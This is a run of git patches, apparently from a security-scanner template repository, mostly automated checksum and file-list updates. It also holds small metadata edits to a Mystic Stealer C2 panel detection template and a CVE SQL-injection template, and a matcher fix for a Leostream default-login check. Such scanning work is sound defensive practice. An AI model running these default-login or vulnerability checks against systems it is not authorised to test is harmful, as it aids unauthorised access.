+network/detection/rpcbind-portmapper-detect.yaml:0b85aa8d1d07f42a62aa98e428c0b6d58f6fd1e8 +network/detection/rsyncd-service-detect.yaml:ba1730d9150726be942d0ad121a6dbec83b3fe3b +network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c +network/detection/samba-detect.yaml:3197e6ce2a87161dd626a2932371d7c74a6ca671 network/detection/smb-detect.yaml:b45723ec2102ebb9355f774e94942b66047ca9f7 network/detection/smtp-detect.yaml:f34814084666d3cf10bc7060fbe8f4aa26ae9179 network/detection/sshd-dropbear-detect.yaml:6de12df88cc72f90f90af1543cb265b63eb0d1bf @@ -6514,24 +6514,24 @@ network/detection/teamspeak3-detect.yaml:f1107f7fbc1242ac9b6cc2f827117a2f279b139 network/detection/telnet-detect.yaml:098d63f049678037f2cadeaa89b7c89a47a7f2a9 network/detection/totemomail-smtp-detect.yaml:10a3b309c84af101efe271220e26db20506d8f7c network/detection/vmware-authentication-daemon-detect.yaml:d37233d58938b0771b9bb617b0a4ba1780c6c4d8 -network/detection/vnc-service-detect.yaml:7f69c25f30229298f2e5a5c54d3939e1c8787f82 +network/detection/vnc-service-detect.yaml:ece40dcfcca0827bf2763d9ef7aca58b607958e1 network/detection/weblogic-iiop-detect.yaml:a03a3be23f27736c85b4c17aa3b4122278cfe26a network/detection/weblogic-t3-detect.yaml:0ad1a44a8714bc494333facc2aba5e84bc289893 network/detection/xlight-ftp-service-detect.yaml:85611143ca36a18417bbd0af9d7bd87f57b14fa8 network/enumeration/beanstalk-service.yaml:ff6de1500ec329dac7a3d24d8e92f9fe8518f1de network/enumeration/kafka-topics-list.yaml:c169fb5b159e4ea9c9a86122afd1b0f0c4fa4943 -network/enumeration/mongodb-info-enum.yaml:9679f4cf1139d8c1e10152ffc13e61f29e1e9905 +network/enumeration/mongodb-info-enum.yaml:137dd278383c71d517fc341a852fb786ace9daad network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e7636143 network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 network/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 -network/exposed-adb.yaml:257a4b487d9b137291729e6d854ba65b588f6bac +network/exposed-adb.yaml:7ced6061a398707eafdd4a2a3e7281f6105f0598 network/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3 -network/exposed-redis.yaml:d8d81feb18118792c88b7d3349d72d4275b5533a -network/exposed-zookeeper.yaml:f1e527d74f8107c9a44e08d75db1db54694dfa96 +network/exposed-redis.yaml:eac55d6dc5da21cf64f485bb13a1307d853df3be +network/exposed-zookeeper.yaml:907b6e2517bcad3ebd432f4b747d9673fbc16c45 network/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 -network/ftp-weak-credentials.yaml:5b8dbf41a9490d719bb506b2b1942ba10831c9aa +network/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0 network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353 @@ -6539,15 +6539,15 @@ network/misconfig/apache-rocketmq-broker-unauth.yaml:a871e00d62ecd6385c67915a9bd network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 -network/mongodb-unauth.yaml:c44e9fee9e5d0fdc5d17786d08e52bd963a0d1fc -network/mysql-native-password.yaml:85827a2b9a5f85a7470a09c3db968ed0d1e22204 +network/mongodb-unauth.yaml:2a820937716debb57d6ac801be7a6eba8f133b13 +network/mysql-native-password.yaml:def1f5d1db0d6e38cfcf636441428b1b8470a4b4 network/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 -network/sap-router-info-leak.yaml:9bdd720e10f0ed8df787a7ac1cf590ac6650684b +network/sap-router-info-leak.yaml:a50079affbf37d44e3a1bf0f5430c9c6473d463c network/sap-router.yaml:9fc64b49f5cdadf1b9ea21a9789e418b8683d7f7 -network/tidb-native-password.yaml:1fab98daa62ee198d3e29cba8990126109534291 -network/tidb-unauth.yaml:86629c493264f28814a57e685ecda740799f123e -network/vsftpd-backdoor.yaml:6ddecfe71f4c667b9b8fe2495c91ed9c48d5709d -network/vulnerabilities/clockwatch-enterprise-rce.yaml:67c4a02fbc6455b622022ba0d435662d6347c4a7 +network/tidb-native-password.yaml:330e8580e6b063fef3c3be74137e85316f75afb6 +network/tidb-unauth.yaml:1b0ca6c12c354340f2cbe218da6fdf78bc8ff393 +network/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 +network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a ssl/c2/cobalt-strike-c2.yaml:fa3905fc13397006d2bdba8729cf4879f3ecf541 @@ -6572,7 +6572,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:ce0e3017b26e281acdb8eeb928692fbb6fef3d4a +templates-checksum.txt:18aa1de7a3429dadb7561eab7a719bf1fa1a0730 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ffdd96a924951e9a7435c87e1e4c8704d65a7a91 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:33:35 +0000 Subject: [PATCH 503/609] Auto Generated New Template Addition List [Fri Jul 7 11:33:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8433c67c34..1f2d8d62e4 100644 --- a/.new-additions +++ b/.new-additions @@ -56,6 +56,7 @@ http/default-logins/pyload/pyload-default-login.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml http/exposed-panels/c2/hookbot-rat.yaml +http/exposed-panels/c2/mystic-stealer.yaml http/exposed-panels/cloudpanel-login.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml From 229ab5e42150da94f8540a5dcdf5be175f8cc197 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:33:51 +0000 Subject: [PATCH 504/609] Auto Generated Templates Checksum [Fri Jul 7 11:33:51 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 582360e37c..2bd1999e34 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2605,6 +2605,7 @@ http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc http/exposed-panels/c2/empire-c2.yaml:68c37a16d8bb6605361cbe6e88824035f48f02be http/exposed-panels/c2/evilginx.yaml:71ad6eb248a72fe3315d3c28f010130b4bd5257d http/exposed-panels/c2/hookbot-rat.yaml:9aa395e99970e3d4a6970f552ba71c923ba39ed4 +http/exposed-panels/c2/mystic-stealer.yaml:d63789b4186c67cb9d21648bc0e867b030b09161 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f @@ -6572,7 +6573,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:18aa1de7a3429dadb7561eab7a719bf1fa1a0730 +templates-checksum.txt:32ec4d86008520cfb7c5c16ffc160870db05688f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ac29ee795820c0b0b86448192c81d8e510751b6e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:35:10 +0000 Subject: [PATCH 505/609] TemplateMan Update [Fri Jul 7 11:35:10 UTC 2023] :robot: --- http/exposed-panels/c2/mystic-stealer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index 55bfe035cb..40abb76172 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,6 +7,7 @@ info: description: | Mystic Stealer panel were detected. metadata: + max-request: 1 shodan-query: http.title:"Mystic Stealer" verified: "true" tags: tech,rat,mystic-stealer,c2,panel From 6389c611774085547ae745b2c2056e43e8e1c8b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:35:30 +0000 Subject: [PATCH 506/609] Auto Generated New Template Addition List [Fri Jul 7 11:35:30 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1f2d8d62e4..c393c95c76 100644 --- a/.new-additions +++ b/.new-additions @@ -48,6 +48,7 @@ http/cves/2023/CVE-2023-28121.yaml http/cves/2023/CVE-2023-2822.yaml http/cves/2023/CVE-2023-30256.yaml http/cves/2023/CVE-2023-30777.yaml +http/cves/2023/CVE-2023-33439.yaml http/cves/2023/CVE-2023-36287.yaml http/cves/2023/CVE-2023-36289.yaml http/cves/2023/CVE-2023-36346.yaml From ca8d217c2b23e609ff03c0e338044bbfe437e198 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:35:38 +0000 Subject: [PATCH 507/609] Auto Generated Templates Checksum [Fri Jul 7 11:35:38 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2bd1999e34..c97076d348 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2346,6 +2346,7 @@ http/cves/2023/CVE-2023-31548.yaml:41c807ff8ce21615be1f3f531a0934058fe10154 http/cves/2023/CVE-2023-32235.yaml:2909b3e8f2c2ca01442dee5be54755312d8f5453 http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 +http/cves/2023/CVE-2023-33439.yaml:dd5b22172e630ec52714e717d36ab217174f6369 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 @@ -6573,7 +6574,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:32ec4d86008520cfb7c5c16ffc160870db05688f +templates-checksum.txt:c6bb50ec72100b06df60eddfa6533eb7fbde8dbd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 646ffaf0b8d7fca3ad94a98c54451719004c113d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:37:24 +0000 Subject: [PATCH 508/609] TemplateMan Update [Fri Jul 7 11:37:24 UTC 2023] :robot: --- http/cves/2023/CVE-2023-33439.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index af59e3f2a7..0ac700e1b2 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2023-33439 cwe-id: CWE-89 metadata: + max-request: 2 verified: true tags: cve,cve2023,sqli,faculty,authenticated From 3448d9d733c86fc3924a7e6a153479aacc4834cc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:43:23 +0000 Subject: [PATCH 510/609] Auto Generated Templates Checksum [Fri Jul 7 11:43:23 UTC 2023] :robot: --- templates-checksum.txt | 52 +++++++++++++++++++++--------------------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c97076d348..8d11865133 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2346,7 +2346,7 @@ http/cves/2023/CVE-2023-31548.yaml:41c807ff8ce21615be1f3f531a0934058fe10154 http/cves/2023/CVE-2023-32235.yaml:2909b3e8f2c2ca01442dee5be54755312d8f5453 http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 -http/cves/2023/CVE-2023-33439.yaml:dd5b22172e630ec52714e717d36ab217174f6369 +http/cves/2023/CVE-2023-33439.yaml:a4c7ce41b77f99923478040575ac6a72a9cfd5f3 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 http/cves/2023/CVE-2023-34362.yaml:ce4c58e702fbc4fa939ce028c8002a8bd26bab93 @@ -2606,7 +2606,7 @@ http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc http/exposed-panels/c2/empire-c2.yaml:68c37a16d8bb6605361cbe6e88824035f48f02be http/exposed-panels/c2/evilginx.yaml:71ad6eb248a72fe3315d3c28f010130b4bd5257d http/exposed-panels/c2/hookbot-rat.yaml:9aa395e99970e3d4a6970f552ba71c923ba39ed4 -http/exposed-panels/c2/mystic-stealer.yaml:d63789b4186c67cb9d21648bc0e867b030b09161 +http/exposed-panels/c2/mystic-stealer.yaml:7f96926be27c3ab5bda2aa86bef093cedb5dbed1 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f @@ -6451,9 +6451,7 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b http/vulnerabilities /other/sitemap-sql-injection.yaml:7422e5c7bfbd6e0ce3b82ff788c311f7c2e3948e misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f -network/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1 -network/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f -network/clickhouse-unauth.yaml:8d98307e532400528f557b511989c948fe564674 +network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/cves/2001/CVE-2001-1473.yaml:1b508a5adba955e833c48e50e2b2eac33282a525 network/cves/2011/CVE-2011-2523.yaml:7547cb75a9cca206a0e70cf2a9c2688c0d96b715 network/cves/2015/CVE-2015-3306.yaml:7a79918776523f2c5e1c5c6af3bf7076d3172b2a @@ -6471,18 +6469,21 @@ network/cves/2022/CVE-2022-0543.yaml:36be19795b4899c702c6819faecefae477f5b0c9 network/cves/2022/CVE-2022-24706.yaml:c9c9a10852d08107d5818e3ca37d716ebc9936e1 network/cves/2022/CVE-2022-31793.yaml:359508b9480ede53286543c34d407e4173562614 network/cves/2023/CVE-2023-33246.yaml:6cd8eb482b6199a6c7298a99ae2bb0e41f2c4c3f +network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 +network/default-login/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0 network/default-login/ldap-anonymous-login.yaml:48fa5969a454ef01ca1cc73deb5423f764de8790 -network/detect-addpac-voip-gateway.yaml:1b5fa0e5473bea5dce2e3a9b8336171fa5f2b47e -network/detect-jabber-xmpp.yaml:cc8d145eb4c5b307134afc8d31a5e4361f9a163d network/detection/activemq-openwire-transport-detect.yaml:22acd24200c9e83b8e8cdf6bf14f23aafe7f40cd network/detection/apache-activemq-detect.yaml:361d7398a15ef9704ce1092df791cacde4bae754 network/detection/axigen-mail-server-detect.yaml:0287cd9a215e13ee19ee62aee96c2ce29a34c433 network/detection/cisco-finger-detect.yaml:d14118008217854746f94430141d0a183b07e182 network/detection/clamav-detect.yaml:349f639ddeede11fa1b3b5cb8282b7599e68af58 network/detection/cql-native-transport.yaml:1e473ad51441688381eb280ca5d8fe7a4edbade1 +network/detection/detect-addpac-voip-gateway.yaml:1b5fa0e5473bea5dce2e3a9b8336171fa5f2b47e +network/detection/detect-jabber-xmpp.yaml:cc8d145eb4c5b307134afc8d31a5e4361f9a163d network/detection/dotnet-remoting-service-detect.yaml:fb9338dba6ec3d7e5cb5a97f220d451c33594c9c network/detection/dropbear-cbc-ciphers.yaml:6d7664dec0349d56bbecb042a516072a2018717f network/detection/esmtp-detect.yaml:a40b86cde437aad247271dbffb12fd488e3b097a +network/detection/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 network/detection/finger-detect.yaml:8a839bb6f7a03f82a7f7ae64b58a594c80e174f3 network/detection/gnu-inetutils-ftpd-detect.yaml:a1c371553151c3783e6ced2d06e35a01d7b2118a network/detection/gopher-detect.yaml:5a0c729755cb87b942ca182fce59aa5bf4435739 @@ -6508,6 +6509,7 @@ network/detection/rpcbind-portmapper-detect.yaml:0b85aa8d1d07f42a62aa98e428c0b6d network/detection/rsyncd-service-detect.yaml:ba1730d9150726be942d0ad121a6dbec83b3fe3b network/detection/rtsp-detect.yaml:6ab1273e3c9a6bc2b7655ba3cc88ece640e5cd5c network/detection/samba-detect.yaml:3197e6ce2a87161dd626a2932371d7c74a6ca671 +network/detection/sap-router.yaml:9fc64b49f5cdadf1b9ea21a9789e418b8683d7f7 network/detection/smb-detect.yaml:b45723ec2102ebb9355f774e94942b66047ca9f7 network/detection/smtp-detect.yaml:f34814084666d3cf10bc7060fbe8f4aa26ae9179 network/detection/sshd-dropbear-detect.yaml:6de12df88cc72f90f90af1543cb265b63eb0d1bf @@ -6527,28 +6529,26 @@ network/enumeration/niagara-fox-info-enum.yaml:850b5da39d09697db2df5321e4b726e6e network/enumeration/psql-user-enum.yaml:0a2f5b0095347687d51554f03cd5141463855dd0 network/enumeration/smtp/smtp-user-enum.yaml:b87cdee6e50d171463194c28ab104f32f51a2f42 network/enumeration/smtp-commands-enum.yaml:833575f9bd672a15739debf1aab8afdb547a0a43 -network/expn-mail-detect.yaml:ea9b02907ca016b2f52e153cbdaab31777064c78 -network/exposed-adb.yaml:7ced6061a398707eafdd4a2a3e7281f6105f0598 -network/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3 -network/exposed-redis.yaml:eac55d6dc5da21cf64f485bb13a1307d853df3be -network/exposed-zookeeper.yaml:907b6e2517bcad3ebd432f4b747d9673fbc16c45 -network/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 -network/ftp-weak-credentials.yaml:d4749ba120717dc1f34f263bc2d9413c2f9662d0 -network/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d -network/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c +network/exposures/cisco-smi-exposure.yaml:22368c9dd2c17aa863f31268713da67650c498b1 +network/exposures/exposed-adb.yaml:7ced6061a398707eafdd4a2a3e7281f6105f0598 +network/exposures/exposed-dockerd.yaml:38d028778904ad743e17ef4928bc535cb7dcc8b3 +network/exposures/exposed-redis.yaml:eac55d6dc5da21cf64f485bb13a1307d853df3be +network/exposures/exposed-zookeeper.yaml:907b6e2517bcad3ebd432f4b747d9673fbc16c45 network/misconfig/apache-dubbo-unauth.yaml:09668afcc0c2b0182f0bf739cb077295a979c353 network/misconfig/apache-rocketmq-broker-unauth.yaml:a871e00d62ecd6385c67915a9bd200d2dfe0f806 +network/misconfig/clamav-unauth.yaml:795eda3df907879e4b11d230ffe0fffaa6fe022f +network/misconfig/clickhouse-unauth.yaml:8d98307e532400528f557b511989c948fe564674 network/misconfig/dropbear-weakalgo.yaml:cf8685d87a0128c0a546c041633a1662d4e814f6 network/misconfig/dropbear-weakmac.yaml:5e49047eec049df0930e0222b820268b2f346024 +network/misconfig/ganglia-xml-grid-monitor.yaml:64fbc138212f342ee6a6e7998777ad21680d079d +network/misconfig/memcached-stats.yaml:2191e9ce7ab2600a59ee35460890fb61f2aff23c +network/misconfig/mongodb-unauth.yaml:2a820937716debb57d6ac801be7a6eba8f133b13 +network/misconfig/mysql-native-password.yaml:def1f5d1db0d6e38cfcf636441428b1b8470a4b4 +network/misconfig/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 +network/misconfig/sap-router-info-leak.yaml:a50079affbf37d44e3a1bf0f5430c9c6473d463c +network/misconfig/tidb-native-password.yaml:330e8580e6b063fef3c3be74137e85316f75afb6 +network/misconfig/tidb-unauth.yaml:1b0ca6c12c354340f2cbe218da6fdf78bc8ff393 network/misconfig/unauth-psql.yaml:416b255a199c9a386b4abc910dd34300740d9fd3 -network/mongodb-unauth.yaml:2a820937716debb57d6ac801be7a6eba8f133b13 -network/mysql-native-password.yaml:def1f5d1db0d6e38cfcf636441428b1b8470a4b4 -network/printers-info-leak.yaml:d264716abc16dd3169d696ba70971190f43cacd1 -network/sap-router-info-leak.yaml:a50079affbf37d44e3a1bf0f5430c9c6473d463c -network/sap-router.yaml:9fc64b49f5cdadf1b9ea21a9789e418b8683d7f7 -network/tidb-native-password.yaml:330e8580e6b063fef3c3be74137e85316f75afb6 -network/tidb-unauth.yaml:1b0ca6c12c354340f2cbe218da6fdf78bc8ff393 -network/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/vulnerabilities/clockwatch-enterprise-rce.yaml:fcfd279274514fa3474ff1b2d83f98c5463ff8c2 ssl/c2/asyncrat-c2.yaml:cbc251e12a123f6f46296a76779cd952e0264f55 ssl/c2/bitrat-c2.yaml:c67772010d602be81f00f76493e5ce09c267496a @@ -6574,7 +6574,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:c6bb50ec72100b06df60eddfa6533eb7fbde8dbd +templates-checksum.txt:f364713da261bfbd0bf4d73e5437461a051b5b5a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f @@ -6713,7 +6713,7 @@ workflows/rstudio-workflow.yaml:6ff4dbc3e210f88947a4eb8fae1573963c84f053 workflows/ruijie-workflow.yaml:cc328047d5c8488d1af9da287f10c112eac7d44e workflows/saltstack-workflow.yaml:4d7644b9d65d2751ca4a084f9a39e77b3a2e5575 workflows/samsung-wlan-ap-workflow.yaml:93586a05b484fdd10d3f1435ad96f60c9efe64f9 -workflows/sap-netweaver-workflow.yaml:def45047e4676ed62ec40cc366aa09722885531e +workflows/sap-netweaver-workflow.yaml:541b9763d49ca52c7cc5aaa9609c0125595c26be workflows/sarg-workflow.yaml:7568c81823aa9d07497cf264c4e5382be640a39a workflows/sco-workflow.yaml:72c0465f2df549e0bb40070c624e2a4fff529711 workflows/sequoiadb-workflow.yaml:ee9115eac36702355050ca06548b75930613ddf7 From 57def2c27c4701c48c5dc34c78311026fd1e58b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 7 Jul 2023 17:18:15 +0530 Subject: [PATCH 511/609] fix matcher --- .../leostream/leostream-default-login.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/http/default-logins/leostream/leostream-default-login.yaml b/http/default-logins/leostream/leostream-default-login.yaml index 44ef9e6936..2536167320 100644 --- a/http/default-logins/leostream/leostream-default-login.yaml +++ b/http/default-logins/leostream/leostream-default-login.yaml @@ -4,15 +4,17 @@ info: name: Leostream Default Login author: bhutch severity: high - description: Leostream default admin credentials were discovered. + description: | + Leostream default admin credentials were discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: leostream,default-login metadata: shodan-query: http.title:"Leostream" max-request: 1 + verified: true + tags: leostream,default-login http: - raw: @@ -31,10 +33,13 @@ http: matchers-condition: and matchers: + - type: word + part: header + words: + - "Set-Cookie: lld=%21" + - 'server.pl' + condition: and + - type: status status: - 302 - - type: word - words: - - "Set-Cookie: lld=%21" - part: header From 8d78ebae689a7c2d24b2050360c32d54e38e7831 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:51:33 +0000 Subject: [PATCH 512/609] Auto Generated New Template Addition List [Fri Jul 7 11:51:33 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c393c95c76..a68c45826e 100644 --- a/.new-additions +++ b/.new-additions @@ -53,6 +53,7 @@ http/cves/2023/CVE-2023-36287.yaml http/cves/2023/CVE-2023-36289.yaml http/cves/2023/CVE-2023-36346.yaml http/default-logins/esafenet-cdg-default-login.yaml +http/default-logins/leostream/leostream-default-login.yaml http/default-logins/pyload/pyload-default-login.yaml http/exposed-panels/arangodb-web-Interface.yaml http/exposed-panels/arcserve-panel.yaml From 56b00451a159af3fa35b25249e29477791e7a3b8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:51:48 +0000 Subject: [PATCH 513/609] Auto Generated Templates Checksum [Fri Jul 7 11:51:48 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d11865133..9e8ad0dca8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2425,6 +2425,7 @@ http/default-logins/jinher/jinher-oa-default-login.yaml:7b6f694950b7978486d73726 http/default-logins/jupyterhub/jupyterhub-default-login.yaml:501f2ac22106ea0073d1ac2c0c083455437cf85c http/default-logins/kanboard-default-login.yaml:a4f10800567ca5d353806c0c9c99c23090847dc8 http/default-logins/kettle/kettle-default-login.yaml:69e19c0142a96a07da2c294618bd9400b541b11e +http/default-logins/leostream/leostream-default-login.yaml:71f045ad48d5e51e8f50efb08e36cf171e2e14bc http/default-logins/lutron/lutron-default-login.yaml:b928bf13b91efcdd0724bbc072bd47fdc1f04ae8 http/default-logins/magnolia-default-login.yaml:920de26b3cda779270b7a6c92df9dbc8113381bf http/default-logins/mantisbt/mantisbt-default-credential.yaml:ebb6707bd92a42e3d6fcdc923a724c3ee6ca1100 @@ -6574,7 +6575,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:f364713da261bfbd0bf4d73e5437461a051b5b5a +templates-checksum.txt:d82135b5013a25e38a9e83ae2fe8a5bb0ab5b4a9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 